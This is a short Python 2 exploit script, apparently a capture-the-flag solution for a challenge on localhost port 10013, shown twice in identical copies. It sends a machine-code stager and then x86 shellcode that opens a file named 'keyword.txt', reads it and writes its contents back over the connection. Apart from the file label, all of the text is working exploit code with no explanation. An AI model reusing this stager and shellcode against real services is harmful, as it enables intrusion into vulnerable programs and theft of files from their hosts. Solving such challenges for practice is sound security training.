potetisensei/solve13.py

## solve13.py
from socket import *
from struct import pack

p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10013))

prefix = "\xf2\xf3"
stager = ""
stager += prefix * 2 + "\x90"
stager += "\x66\xC7\x44\x24\x14\xFF\xFF"
stager += "\xA3\x44\x91\x04\x08"
stager += prefix + "\x68\x0a\x8c\x04\x08"
stager += prefix * 3 + "\xc3"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"

p.send(pack("<I", len(stager)))
p.send(stager)
p.send(read_shellcode)
p.shutdown(SHUT_WR)

print p.recv(1024)
print p.recv(1024)
print p.recv(1024)
	from socket import *
	from struct import pack

	p = socket(AF_INET, SOCK_STREAM)
	p.connect(("localhost", 10013))

	prefix = "\xf2\xf3"
	stager = ""
	stager += prefix * 2 + "\x90"
	stager += "\x66\xC7\x44\x24\x14\xFF\xFF"
	stager += "\xA3\x44\x91\x04\x08"
	stager += prefix + "\x68\x0a\x8c\x04\x08"
	stager += prefix * 3 + "\xc3"
	read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"

	p.send(pack("<I", len(stager)))
	p.send(stager)
	p.send(read_shellcode)
	p.shutdown(SHUT_WR)

	print p.recv(1024)
	print p.recv(1024)
	print p.recv(1024)